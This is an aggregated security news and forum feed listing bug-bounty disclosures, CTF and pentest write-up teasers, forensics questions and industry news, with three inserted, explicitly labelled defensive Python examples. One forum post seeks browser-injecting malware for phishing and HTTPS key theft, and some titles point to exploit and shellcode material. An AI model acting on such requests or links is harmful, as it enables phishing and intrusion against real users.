    Yelp disclosed a bug submitted by xinfohuggerx: https://hackerone.com/reports/1763266
    Subdomain Takeover via Unclaimed Amazon S3 Bucket (Musical.ly)
    TikTok disclosed a bug submitted by daik0n: https://hackerone.com/reports/1102537 - Bounty: $200
    Exceed photo dimensions, Flickr.com
    Flickr disclosed a bug submitted by 0xcyborg: https://hackerone.com/reports/1755552 - Bounty: $50
    I found another way to bypass Cloudflare Warp lock!
    Cloudflare Public Bug Bounty disclosed a bug submitted by joshatmotion: https://hackerone.com/reports/1605847 - Bounty: $1000
    Bypass Cloudflare WARP lock on iOS.
    Cloudflare Public Bug Bounty disclosed a bug submitted by joshatmotion: https://hackerone.com/reports/1542450 - Bounty: $500
    Completely remove VPN profile from locked WARP iOS client.
    Cloudflare Public Bug Bounty disclosed a bug submitted by joshatmotion: https://hackerone.com/reports/1633231 - Bounty: $1000
  • Open

    Lost at Sea Writeup
    Instructions: Crack the password to open the ship logbook file Continue reading on The Sleuth Sheet »
    The Last Hunter Standing: A Historic OSINT CTF — Writeup
    Mission Briefing Continue reading on The Sleuth Sheet »
    Loose Threads
    By Omega Point & The Hermetic Penetrator Continue reading on Medium »
  • Open

    HuskyHacks: Interview
    Red Teamer, Ethical Hacker, Researcher Continue reading on Medium »
    Malware Development pt. 2 — Understanding Different PE Sections
    As a continuation to my study, this note goes a little bit deeper into the different portion of “Sections” of a Portable Executable (PE)… Continue reading on Medium »
    Invinsense OXDR and Invinsense OMDR:
    Red Teaming Solutions and Services that Help You Witness Attackers Without Actual Attacks Continue reading on Medium »
    Hacking Tools & Resources for Bug Bounties, Red Teaming, And More!
    A curated list of the top hacking tools I’ve found work for bug hunting and pen-testing better than the rest. Continue reading on The Gray Area »
  • Open

    Can anyone help with setting up a cyber security discord, and review how it looks so far. Any feedback is greatly appreciated!! Thanks
    https://discord.gg/92F9h788JG submitted by /u/Jazzlike_Heart_7184 [link] [comments]
    Devs who had their work penetration-tested: what was the most surprising result or fact you heard/learned?
    I was just curious about what your oddest or funniest or worst experiences were, what you learned or what surprised you the most. That's all folks :) submitted by /u/Notalabel_4566 [link] [comments]
    Question about DatAshur SD
    Quoting from their website: datAshur SD is a PIN authenticated, hardware encrypted, USB Type-C flash drive designed to incorporate removable iStorage microSD Cards. It is FIPS 140-3 Level 3 certified which means it is tamper-proof. So my view is: the tamper-proof part is only the USB stick, aka the SD card reader, not the SD card itself. Why would I hack into HW (the USB stick) when all valuable data is stored on the SD card? I can take the SD card from that FIPS 140-3 Level 3 reader, insert it into a $10 SD reader and start brute forcing. A whole other level are regular USB sticks with a fixed memory chip. If they are FIPS 140-3 Level 3 certified, that means you cannot remove the memory chip (which stores your data in encrypted form) without destroying the chip itself. The problem of losing the SD card and its consequences is not explained at all. There's one comment on YouTube saying "SD card should not be readable in other device". How did they achieve it? submitted by /u/mrmh1 [link] [comments]
    Teach me something about telephony security!
    Over the past year, I have been working on a concept for an ECC (Emergency Communications Center, aka a 911 Dispatch Center) focused security platform offering. I have been finding via outreach and research that cyber-attacks both on computer networks and CAD (Computer Aided Dispatch) telephony systems are becoming more and more prevalent. It almost feels like every time I talk to an ECC director I hear a new story about some ransomware attack that brought the ECC back to operating on pen and paper, or an ECC that experienced a telephony denial of service attack that caused all of their 911 trunks to ring at capacity (effectively knocking an entire 911 center out of action). One of the things I love about my job is that solving these problems helps first responders save lives! So, help me help all of our first responders and public safety workers out there! Tell me about what you guys know specifically about telephony based cyber-attacks. Things like telephony denial of service, spoofing and common ways to protect against those types of attacks. Tell me about your experiences with telephony security in general! If you work in Public Safety IT/Security, tell me about your experience with ANI/ALI and CAD security! submitted by /u/DeMiNe00 [link] [comments]
    What are your thoughts on automated pentest tools?
    Our team is thinking of getting cloud-based pentest tools, such as FortiPenTest. Do you think this can replace manual pentesting? Just wanted to get some advice before we invest in this. Or should we just keep up with the traditional pentest? Thanks. submitted by /u/Hinata778 [link] [comments]
    How to mitigate SSRF in PDF converter via an OLE Object?
    I have an application that is converting files to PDF via LibreOffice. I've managed to stop SSRF via HTML, by inspecting files and ensuring they are ODT/DOC/DOCX. But now, I've had a pentest and they've identified that they can add an OLE object, and that will do SSRF. (Like this: https://r4id3n.medium.com/ssrf-exploitation-in-spreedsheet-to-pdf-converter-2c7eacdac781 ) How can I stop SSRF in this case? submitted by /u/Soggy_Bag_8745 [link] [comments]
    Knowledge management systems for small teams
    I have a small pentesting team (<10 people), which works great on a technical level, but we realized systematically storing knowledge and making it accessible for everyone is annoyingly hard. I'd love to keep it as simple as possible. I'm now trying out various tools. I've only heard good things about Obsidian, Notion and Joplin. What tools do you recommend to structure, store and share knowledge? submitted by /u/fishy-colinmclean [link] [comments]
  • Open

    is there a better way to view/explore the directories?
    I can see the filenames, size etc. in folders, but it would be cool to be able to see the images and video thumbnails etc. without actually clicking the links. Give it a file explorer kind of look in the browser. It would make it easy to take a quick look at the contents of a directory. Has it already been done? Can somebody provide JavaScript code for this? I can/may code a solution for it if I don't find a decent solution here. Suggest more edits to make this more reachable/understandable, because I couldn't find a decent solution on the internet. submitted by /u/uzair7866 [link] [comments]
    Massive NSFW image gallery and Films
    I stumbled into this at first - NSFW Then, of course, I am at a complete loss when I followed up the chain- Frankly, I have no idea what to do with it. This is just a MASSIVE NSFW picture gallery that has nothing to do with the above two submitted by /u/Nathen_black [link] [comments]
    A good set of TV series and Movies with Smaller Sizes
    I don't know if this was posted here before, but I randomly found this while searching for Black Adder. Smaller sizes are great for downloading with limited internet connections. Here. submitted by /u/Nathen_black [link] [comments]
    Images
    So you want an Image... Link... Stay out of depressive_etc/ sick shit... Yep ripped & torrenting why not... submitted by /u/xanderTgreat [link] [comments]
  • Open

    How we ‘hacked’ Telenet’s cybersecurity quiz
    Not so long ago, Telenet Business ran a quiz to find the smartest cyber specialist. The quiz consisted of 20 questions and your score… Continue reading on Medium »
    Let’s Cheat by changing FALSE to TRUE!
    Hello H4ck3rs, c0ff33b34n here with a new write-up. In last write-up we have seen a simple DOM based XSS Trick. Today we are going to… Continue reading on Medium »
    Stormshield SNS cleartext password leak
    Foreword: the issue was privately disclosed to Stormshield. It is in their eyes a minor inconvenience, but they are not willing to address this… Continue reading on Medium »
    Gift Card Hacking
    During the past few years, I’ve read many articles about how hackers steal your gift card balance before you use it. I read what they were… Continue reading on Medium »
  • Open

    Awesome CISO Maturity Models
    submitted by /u/hipver [link] [comments]
    Substation: data pipeline and transformation toolkit for security teams
    submitted by /u/jshlbrd-brex [link] [comments]
    Client-side path traversal attacks
    submitted by /u/albinowax [link] [comments]
    Malicious Python Packages Replace Crypto Addresses in Developer Clipboards
    submitted by /u/louis11 [link] [comments]
    drgn - a debugger with an emphasis on programmability
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-11-07 Review
    SecWiki Weekly (Issue 453) by ourren; An analysis of the standards system for critical information infrastructure security protection by ourren; How to track social media users across platforms by ourren; A brief discussion of endpoint security and DLP governance by ourren; Modernized security products by ourren; How to test Settings functionality by 蓝色淡风. For more of the latest articles, visit SecWiki
  • Open

    P4 CTF: Apfel Seite
    No content preview
    ‍IW Weekly #32: 2FA Bypass, OpenSSL Vulnerabilities, Automated Recon Script, Subdomain…
    No content preview
    Write-up: Unprotected admin functionality @ PortSwigger Academy
    No content preview
    HTB ‘Blackfield’ [Writeup]
    ASREPRoast | Dictionary attack | Continue reading on InfoSec Write-ups »
    Enterprise — Tryhackme Writeup
    No content preview
    Story of a $1k bounty — SSRF to leaking access token and other sensitive information
    No content preview
  • Open

    FreeBuf Morning Report | UK NCSC scans all internet-connected devices; cyberattack halts trains run by Denmark's DSB
    The UK National Cyber Security Centre (NCSC) announced that it is scanning all internet-exposed devices hosted in the UK to look for vulnerabilities.
    Beware! A new form of phishing malware specifically targets Python developers
    Recently, a new form of phishing malware has been specifically attacking Python developers. These packages have already been downloaded as many as 5,700 times.
    From the system kernel to the underlying chip, the mobile security issues you care about were all at this year's MOSEC
    On November 4, the 2022 MOSEC Mobile Security Conference, hosted by Qi An Pangu (Pangu Lab) and Korea's POC, was held in Shanghai.
    Another boost for cyber insurance: "Opinions on Promoting the Standardized and Healthy Development of Cyber Insurance (Draft for Comment)"
    Cyber insurance is an emerging line of insurance that covers cybersecurity risk; it has become an important tool for transferring and mitigating that risk and plays an important role in building a socialized cybersecurity service system.
    Judging panel for the "WitAwards 2022 China Cybersecurity Industry Annual Awards" officially announced
    The WitAwards 2022 in-person awards ceremony will be held on November 16 at the Shanghai main venue of the CIS 2022 Cyber Security Innovation Conference.
    State Council Information Office releases white paper "Jointly Building a Community with a Shared Future in Cyberspace"
    Beijing, November 7: The State Council Information Office released the white paper "Jointly Building a Community with a Shared Future in Cyberspace" on the 7th
    Well-known accounting firm hit as LockBit ransomware steps up its activity
    The LockBit ransomware group stole data from the well-known accounting firm Kearney Company and demanded a $2 million ransom.
  • Open

    Hackers Distribute RomCom RAT Using Malicious Versions of KeePass and SolarWinds Software
    Author: BlackBerry Research and Intelligence Team. Translator: 知道创宇404实验室 translation group. Original link: https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass. Summary: The threat actor known as RomCom is leveraging the brand power of SolarWinds, KeePass and PDF Technologies in a series of new attack campaigns. The BlackBerry Threat Research and Intelligence Team, while analyzing...
    Analysis of the CVE-2022-22980 Spring Data MongoDB SpEL Expression Injection Vulnerability
    Author: xxhzz@星阑科技PortalLab. Original link: https://mp.weixin.qq.com/s/8zzXZgSwHAmte5t7KSDhdA. Vulnerability description: On June 20, VMware published a security advisory fixing a SpEL expression injection vulnerability in the Spring Data MongoDB component; the vulnerability has a CVSSv3 score of 8.2, is designated CVE-2022-22980, and is rated high severity. Spring...
  • Open

    CVE-2022-33679 Windows Kerberos Elevation of Privilege
    Article URL: https://github.com/Bdenneu/CVE-2022-33679 Comments URL: https://news.ycombinator.com/item?id=33500500 Points: 1 # Comments: 0
  • Open

    Noob question: How can I find out what file was created after someone opened a pdf on autopsy
    Hello everyone, I am looking at an image in Autopsy, and someone downloaded a malicious PDF, and I am trying to find out what file was created after a user opened the file. I have looked over Autopsy, but I am having trouble finding it. On the context menu it says "program run on," but when I click that I can't see anything. My other question is, instead of using Autopsy, is there a Splunk search I can run that would help me find this? submitted by /u/Sgtkeebler [link] [comments]
    Can you find a partition's size in FTK Imager / EnCase?
    Hello, for an assessment in my Cyber Security course, we had to image a partition on a physical hard drive and I was just wondering if it was possible to find the partition's size in either FTK Imager or EnCase? It is an NTFS partition and has been imaged in a .E01 file and it was just the partition that got imaged so no MBR or whatever the NTFS equivalent is (MFT?). I ask this because our partitions were only meant to be 2GB large but in my case I have a suspicion that it was the whole 250GB hard drive. It was definitely the correct partition we needed as it was literally called "IMAGE_ME". Any help appreciated, thanks. submitted by /u/melthamlewis [link] [comments]
  • Open

    $1000 BAC: The Complete Guide to Exploiting Broken Access Control
    TL;DR- What is BAC, how to best exploit it, and how to get the biggest bounties from it. Continue reading on The Gray Area »
    Awesome Bug-Bounty
    A curated list of awesome bug-bounty tools and resources. Continue reading on Medium »
    Caiyon.com (Dall-E Mini) Reflected XSS Vulnerability
    Reflected XSS Bug in Caiyon.com AI Image Generator Continue reading on Medium »
    IDOR on Unsubscribe emails to $200 bounty.
    Recently I got an invitation from a financial website. I registered my account but initially was unable to find anything. Continue reading on Medium »
    403 Forbidden: Access Control Bug Hunting
    TL;DR- An overview of the vulnerability and potential exploit vectors for bug bounty and white-hat hacking purposes. Continue reading on The Gray Area »
    VPS web hacking tools
    Automatically install some web hacking/bug bounty tools for your VPS. Continue reading on Medium »
    6 Free Cyber Security Courses With Certificates
    Hello there, guys! Continue reading on Medium »
    Web Security Academy — Blind OS command injection with time delays
    This lab is part of the Web Security Academy by Portswigger. It is under the category “OS command injection”. This time we have to exploit… Continue reading on Medium »
  • Open

    ThinkstScapes Quarterly | 2022.Q3 | Summary of a lot of conference talks
    submitted by /u/ffyns [link] [comments]
  • Open

    A list of search engines for Marketers/Pen-testers/OSINT Engineers — Part-1
    Your guide for Open Source Intelligence Continue reading on Medium »
    Phishing — What you need to know
    What’s phishing? Continue reading on Medium »
    SPY NEWS: 2022 — Week 44
    Summary of the espionage-related news stories for the Week 44 (30 October-5 November) of 2022. Continue reading on Medium »
  • Open

    TF-CSIRT TRANSITS Workshops
    If you've ever attended any of the Trusted Introducer TRANSITS workshops, I'd love to ask about your opinion on them, if it was worth it, what it was like, if it was more hands-on with exercises, or more lecture-like. Thanks! submitted by /u/FreakySeahorse [link] [comments]
    Ideas for master thesis on Cyber Security - Ethical Hacking?
    Hey all, I need to decide a topic in order to present to my professor for my master thesis. The problem is that I still have no idea what to be focused on, because I have some constraints. Since at the moment I'm an intern consultant for a cybersec company, and I'm doing penetration testing there, I should do the thesis with things related to vulnerability assessment and pentesting. I like cryptography as well and my idea was related to a development of a decentralized CA, but as I said I guess it's not part of the ethical hacking stuff. Any idea/suggestion before I talk with my professor? submitted by /u/electronixxx [link] [comments]
    Local website apparently does not exist???
    So, there is a local school-related website that has worked like a charm for the past few months. Suddenly, it started taking 30 to 60 seconds to load. I tried using nslookup, but it just said that the domain was non-existent!!! I also tried pinging it in cmd, but it could not find that host. GET requests via Python take 60 seconds, but they return 200! Any DNS lookup services that I tried cannot find said website, while I can enter said website, just as my friends can too! I don't think it can be a local DNS server, because I set mine to Google or Cloudflare. What could be happening? submitted by /u/Bulky-Technology-398 [link] [comments]
    What is the attack?
    My coworker and I are discussing how to interpret this request. We do not agree. There are around 500 of these POST requests in about 15 min. There are a lot more requests from this IP, but this request stands alone for these 15 min. 91.19x.xxx.xxx - - [03/Nov/2022:04:37:54 +0100] "POST /media/j57obix/hen. jpg" 406 5193 "_" "Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en)+AppleWebKit/528.16+(KHTML,+like+Gecko)+Version/4.0+Safari/528.16" submitted by /u/lalatyn [link] [comments]
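    One way to quantify the pattern the post above describes, as an added example (this is not code from the thread): parse combined-format access-log lines, group requests by client IP and path, and report any pair that reaches a threshold inside a sliding 15-minute window. The log format is assumed to be Apache/nginx "combined", with '+' standing in for spaces inside the User-Agent as in the quoted line; the sample lines are constructed here from documentation IP ranges, not real traffic.

```python
"""Find bursts of identical POST requests in a web-server access log.

Added example, not code from the original thread. Assumes the "combined"
log format; the sample lines below are constructed, not real logs.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_bursts(lines, window=timedelta(minutes=15), threshold=100, method="POST"):
    """Group requests by (client IP, path) and report every pair whose request
    count inside any sliding window of length `window` reaches `threshold`.
    Returns {(ip, path): max_count_in_one_window}."""
    stamps_by_key = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == method:
            stamps_by_key[(rec["ip"], rec["path"])].append(rec["ts"])
    bursts = {}
    for key, stamps in stamps_by_key.items():
        stamps.sort()
        start, best = 0, 0
        for end, ts in enumerate(stamps):
            # slide the window start forward until it is within `window` of ts
            while ts - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[key] = best
    return bursts

def _constructed_log():
    """500 POSTs to one path from one client, one second apart, plus unrelated
    GETs from another client (constructed data, not real logs)."""
    tz = timezone(timedelta(hours=1))
    base = datetime(2022, 11, 3, 4, 37, 54, tzinfo=tz)
    ua = ("Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en)+AppleWebKit/528.16"
          "+(KHTML,+like+Gecko)+Version/4.0+Safari/528.16")
    fmt = "%d/%b/%Y:%H:%M:%S %z"
    lines = []
    for i in range(500):
        ts = (base + timedelta(seconds=i)).strftime(fmt)
        lines.append(f'198.51.100.7 - - [{ts}] "POST /media/j57obix/hen.jpg HTTP/1.1" '
                     f'406 5193 "-" "{ua}"')
    for i in range(20):
        ts = (base + timedelta(seconds=30 * i)).strftime(fmt)
        lines.append(f'203.0.113.9 - - [{ts}] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.85.0"')
    return lines

SAMPLE_LINES = _constructed_log()

if __name__ == "__main__":
    for (ip, path), count in find_bursts(SAMPLE_LINES).items():
        print(f"{ip} sent {count} POSTs to {path} within 15 minutes")
```

    The sliding window keeps the check linear in the number of requests per key, so the same function can be pointed at a full day's log (`find_bursts(open("access.log"))`) and tuned with `threshold` and `window`; lines that do not match the format are skipped rather than failing the run.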
  • Open

    A lot of Movies, shows, manga, novels and anime
    https://ddl.itonaku.xyz/ submitted by /u/Isolatedleliel [link] [comments]
  • Open

    SecWiki News 2022-11-06 Review
    Writeup for the 2022 Industrial Information Security Skills Competition "Wangyue Cup" championship by 路人甲; Strange DNS hijacking on an OpenWrt router by 路人甲; For more of the latest articles, visit SecWiki
  • Open

    Alternative use cases for Systemfunction032
    https://s3cur3th1ssh1t.github.io/SystemFunction032_Shellcode/ submitted by /u/S3cur3Th1sSh1t [link] [comments]
  • Open

    API Security Top 10 vulnerabilities: the crAPI vulnerable lab and how to solve it
    The best way to learn a technique is hands-on practice. This article walks through the common API vulnerabilities using the crAPI lab and covers the OWASP API Top 10.
    FreeBuf Morning Report | Microsoft to keep providing Ukraine with free cloud services next year; Japan joins NATO cyber defence centre
    According to Japan's Jiji Press on November 4 local time, Defense Minister Yasukazu Hamada said at a press conference that day that Japan has formally joined NATO's cyber defence centre.
  • Open

    Software that can help track cmd commands during session?
    Hey guys, does anyone know what application can help me with tracking cmd commands whenever I install/running applications? the closest thing I've seen so far is any.run but the sandbox is limited to 16mb and I'm working with applications larger than that submitted by /u/myaaa_tan [link] [comments]
    File Handles in Volatility
    Can you access the data inside file handles in Volatility? I'm carrying out a RAM dump to find a generated key stored in a "sSecretKey" variable which is pinned to a memory handle 0x010f13e9 (both variable and handle in screenshot). Can I access this memory handle directly using Volatility, using "handles" or using any other approach? I would also be interested in any solution using yarascan to find this variable value. Note: Visual Studio encoding does not appear to be faithful to the actual variable value; it appears to be UTF-8 or some encoding which scrambles our key value effectively with ?'s. Key Variable and Memory Handle submitted by /u/Forensics808 [link] [comments]
    Courses?
    Which online courses to buy do you recommend, for Digital Forensics and in particular Mobile Forensics? I have already taken some courses in Italy, I have basic skills. submitted by /u/Zipper_Ita [link] [comments]
    question about global.db of Dropbox
    Hello, I've extraced the global.db of dropbox from an Android device which has a table named shared_links. It has stored file paths which lead to a local folder which has the name of the image/Video and in the folder there are thumbnails of the video or picture as far as i understand. Does anyone know at what conditions these paths are created? Maybe when i create a link of my pictures and videos and share it? Also there are other tables, maybe more of them are forensically relevant? I couldn't find any information about the database. Thank you very much submitted by /u/JustARandomDude54 [link] [comments]
  • Open

    I found a huge company with *horrendous* password procedures. Is there anyone to report this to?
    As I was signing up for an account on this company's website, I noticed the following: Answers to security questions are stored in plaintext The maximum character limit for passwords is 10 Only alphanumeric characters are accepted Easily predictable name-based usernames are assigned to each user and are unchangeable It's hard to overstate how big this company is within its field. Practically a monopoly. It's a more hidden part of the website, which is why I think it probably hasn't been updated in over a decade, but pretty much everyone who uses the site will have to create an account there at some point. They seemingly have no dedicated webmaster or security person to contact. I will email their support, but I highly doubt this will lead them to redo their entire system. I know this isn't technically a security vulnerability, but it is pretty much the definition of a best practices violation. Is there any sort of organization or agency I should contact about this? And how much time should I give them before I disclose this to the public? There are a huge amount of people using this system with no idea their security is at risk. Oh, and does the fact that there is a maximum password limit imply that they are storing the passwords in plaintext too? I looked it up and saw some people point out that properly stored passwords would probably be the same length in the database if they were hashed and salted. submitted by /u/yrdz [link] [comments]
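    The post above asks whether a maximum password length implies plaintext storage. An added example (not code from the poster or from the site described) that shows why it does not follow: a salted password hash produces a fixed-size stored record regardless of password length, so a short maximum is a choice made in the application's policy code, not something hashing requires. PBKDF2-HMAC-SHA256 from the standard library stands in for a memory-hard scheme such as Argon2 or bcrypt; the iteration count and policy limits are illustrative, and `LEGACY_POLICY` models the restrictions described in the post.

```python
"""Password storage versus password policy.

Added example, not from the original post. PBKDF2 is used as a stdlib
stand-in for Argon2/bcrypt; numbers are illustrative.
"""
import hashlib
import hmac
import os

ITERATIONS = 200_000  # illustrative; tune upward for production hardware

def hash_password(password, salt=None):
    """Return a self-describing record: algorithm$iterations$salt$digest.
    The record length does not depend on the password length."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password(password, record):
    """Recompute the digest with the stored salt and compare in constant time."""
    algo, iterations, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)

def check_policy(password, min_len=12, max_len=128, alnum_only=False):
    """Return a list of policy violations (an empty list means accepted).

    max_len exists only to bound hashing cost per login attempt, so it can be
    generous; alnum_only is here to model the restrictive policy described in
    the post, not as a recommendation."""
    problems = []
    if len(password) < min_len:
        problems.append(f"shorter than {min_len} characters")
    if len(password) > max_len:
        problems.append(f"longer than {max_len} characters")
    if alnum_only and not password.isalnum():
        problems.append("contains characters outside A-Z, a-z, 0-9")
    return problems

# The policy described in the post, for comparison with the defaults above.
LEGACY_POLICY = {"min_len": 1, "max_len": 10, "alnum_only": True}

if __name__ == "__main__":
    short = hash_password("correct horse", salt=b"\x00" * 16)
    long_ = hash_password("x" * 200, salt=b"\x00" * 16)
    print(len(short), len(long_))  # equal: storage never sees the password size
    print(check_policy("Tr0ub4dor&3 is long enough!", **LEGACY_POLICY))
```

    A fixed salt is passed in `__main__` only so the two records are comparable; real calls take the random salt from `os.urandom`. If a site also caps the length of security-question answers, that cap is again a policy decision, and answers can be hashed with the same routine as passwords.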
    Don't want to be pentester anymore
    I worked as a pentester for the last 6 years or so, mostly in the areas of web apps, mobile apps, thick clients, and external/internal networks. I don't want to do it anymore. If I would like to transition, in what areas of security do you think typical pentesting skills or knowledge are useful? I imagine that threat hunting sounds reasonable, but maybe you have some other ideas? submitted by /u/f00000d [link] [comments]
  • Open

    Directory traversal in PDF viewing application. Leading to full database takeover
    Hello everyone, this is my first write-up here and i hope you enjoy. Continue reading on Medium »
    Exploit Feature To Get High Bug impact
    how I Exploit Website Feature To Get High Bug impact Continue reading on Medium »
    Bug Zero at a Glance [Week 29 October — 4 November]
    This week was an exceptional week for Bug Zero! Continue reading on Bug Zero »
    Story of a $1k bounty — SSRF to leaking access token and other sensitive information
    Hello and welcome everyone to my story of how I got my first bounty on HackerOne by exploiting an SSRF that leaked Google cloud access… Continue reading on InfoSec Write-ups »
    ApeCoin DAO Consent to $4.4M For Bug Bounty Scheme on ImmuneFi
    Continue reading on Medium »
    PENTEST TALES: EXIF Data Manipulation
    Delivering XSS via unconventional means Continue reading on Medium »
  • Open

    Huge Collection of Digital TTRPG Tokens
    submitted by /u/Glad-Line [link] [comments]
  • Open

    SOCK PUPPET
    A sock Puppet Account also can be referred to as a burner account. These accounts are used and are not associated with us in any way. This… Continue reading on Medium »
    Analyzing Telegram chats and channels. Regular expressions in OSINT in practice
    Reading other people’s conversations in public Telegram chats can sometimes be very boring and tedious. Continue reading on Medium »
  • Open

    SecWiki News 2022-11-05 Review
    No news updates today~ For more of the latest articles, visit SecWiki
  • Open

    CVE-2022-35252: control code in cookie denial of service
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1686935 - Bounty: $480
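    The report title above names a denial of service caused by control codes inside a cookie. As an added example (this is not curl's code and does not reproduce the reported bug), the following client-side cookie jar enforces the Set-Cookie grammar of RFC 6265 section 4.1.1 before a cookie is stored or echoed back: cookie-name must be an HTTP token, and cookie-value consists of cookie-octets, which exclude control characters, whitespace, DQUOTE, comma, semicolon and backslash. This is stricter than the lenient parsing browsers apply under section 5.2, which is the point: a client that stores what the server sends and replays it unfiltered can be made to send a request the origin then refuses. The sample headers are constructed.

```python
"""Reject cookies whose name or value contains control characters.

Added example; not curl's code. Enforces RFC 6265 section 4.1.1 syntax on the
receiving side. Sample Set-Cookie headers are constructed.
"""
import string

_TOKEN_CHARS = frozenset(string.ascii_letters + string.digits + "!#$%&'*+-.^_`|~")

def is_token(name):
    """RFC 7230 token: at least one character, none of them CTLs or separators."""
    return bool(name) and all(ch in _TOKEN_CHARS for ch in name)

def is_cookie_octet(ch):
    """cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E"""
    o = ord(ch)
    return (o == 0x21 or 0x23 <= o <= 0x2B or 0x2D <= o <= 0x3A
            or 0x3C <= o <= 0x5B or 0x5D <= o <= 0x7E)

def is_cookie_value(value):
    """cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE )"""
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        value = value[1:-1]
    return all(is_cookie_octet(ch) for ch in value)

def parse_set_cookie(header):
    """Return (name, value, attributes) or None if the header is malformed.
    Only ASCII space and tab are trimmed, so CTLs are never silently dropped."""
    pair, _, rest = header.partition(";")
    name, eq, value = pair.partition("=")
    name, value = name.strip(" \t"), value.strip(" \t")
    if not eq or not is_token(name) or not is_cookie_value(value):
        return None
    attributes = {}
    for av in rest.split(";"):
        if av.strip(" \t"):
            k, _, v = av.strip(" \t").partition("=")
            attributes[k.strip(" \t").lower()] = v.strip(" \t")
    return name, value, attributes

class CookieJar:
    def __init__(self):
        self.cookies = {}
        self.rejected = []

    def add_from_headers(self, set_cookie_headers):
        """Store well-formed cookies; keep rejected headers for logging.
        Returns the number of cookies accepted."""
        accepted = 0
        for header in set_cookie_headers:
            parsed = parse_set_cookie(header)
            if parsed is None:
                self.rejected.append(header)
                continue
            name, value, _ = parsed
            self.cookies[name] = value
            accepted += 1
        return accepted

    def cookie_header(self):
        """Value for the outgoing Cookie request header."""
        return "; ".join(f"{n}={v}" for n, v in self.cookies.items())

if __name__ == "__main__":
    jar = CookieJar()
    jar.add_from_headers([
        "session=abc123; Path=/; HttpOnly",
        "bad=a\x1fb; Path=/",   # control character inside the value
        "ctrl\x01name=x",       # control character inside the name
    ])
    print("Cookie:", jar.cookie_header())
    print("rejected:", [h.encode() for h in jar.rejected])
```

    The jar ignores Path, Domain and expiry on purpose to keep the example short; a real client applies them after this syntax check, never before, so that a malformed cookie is dropped before any scoping logic runs.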
  • Open

    WordPress Vulnerabilities & Patch
    submitted by /u/seyyid_ [link] [comments]
  • Open

    Office of the Central Cyberspace Affairs Commission issues the "Notice on Effectively Strengthening the Governance of Online Violence"
    Online violence targets individuals with a concentrated flood of insults, rumours and defamation, privacy violations and other unlawful or hostile information, infringing others' lawful rights and disrupting normal online order.
    Musk's bloodbath at Twitter: the entire security department laid off
    Dissatisfied with Twitter's security and content moderation, Musk disbanded Twitter's entire security department.
  • Open

    HRDevHelper - Decompiler Plugin for Hex-Rays by Dennis Elser
    submitted by /u/Gallus [link] [comments]
    AWS Organizations Defaults - Hacking The Cloud
    submitted by /u/RedTermSession [link] [comments]

  • Open

    I'm a student and I'm stuck on a Windows image, not sure where else to turn
    I hope you don't mind beginner-level questions! I'm in a digital forensics class and we've been given an image to analyze (Windows, I think 2000 but I'm not in front of the assignment right now). I found EFS-encrypted files, and I've found hints in the image's chat/email logs that instruct us on how to use the System and SAM registry hives to crack the password and decrypt the files. Unfortunately, the demo programs (FTK Imager Lite and Password Recovery Toolkit) don't have the features hinted at in the assignment and I can't find free programs to use instead. Is there a good (and free, that bit's important) replacement tool I can use to extract the hashes from the SAM hive, crack them, and then decrypt the EFS files in an image? I've seen lots of easy ways to do it in a mounted drive, but this image has been hacked to bits to make it easy for a student to analyze and I doubt it can be mounted anymore. submitted by /u/tacticalfashion [link] [comments]
    malware or rootkit that inject html in the browser..
    Hello, does anyone know a malware or rootkit that injects HTML in the browser? It should inject HTML in the victim's browser to make a sort of phishing on a specific website. Or something that exfiltrates HTTPS encryption keys. In this way the attacker, having hacked the router and having the encryption keys, could make a MITM attack for phishing or just spy on the user with a very low fingerprint. EDIT: something like snakso, but it should inject HTML code in the browser. In the case of snakso it injects HTML code in the webserver. Other snakso analysis submitted by /u/SkyTeeth [link] [comments]
    Intella for Investigations
    I've used a wide variety of forensic tools throughout the years (e.g. FTK, Nuix, EnCase, Axiom), and have come across Intella. I really like some of the capabilities when handling email in particular. A colleague of mine recently advised that he had heard (in the eDiscovery space) that there were some complaints of Intella "missing things". He couldn't provide details or specifics, and so I thought I'd reach out to the greater good to get thoughts on Intella as a processing tool. I know Intella can become fairly convoluted (with the bubbles in particular), but I've found that if you actually understand how the tool works, the tool is very effective. I've validated the tool with sample sets of data, but I think we all know that data comes in "all shapes and sizes". I'm just curious if there are some out there that have actually experienced issues with the processing and searching using this tool (actually missing data), or what their experience has been so far. submitted by /u/W1nterRanger [link] [comments]
    Forensics@NIST 2022, Nov. 8-10 : free virtual conference
    Free, virtual conference which includes a digital forensics track. Details and registration at https://www.nist.gov/news-events/events/2022/11/forensicsnist-2022 submitted by /u/dwhite21787 [link] [comments]
  • Open

    OverTheWire type resources to learn Google hacking
    I loved OverTheWire WarGames to learn Linux. I am wondering if there are any similar idea/site to learn google hacking? submitted by /u/palm_snow [link] [comments]
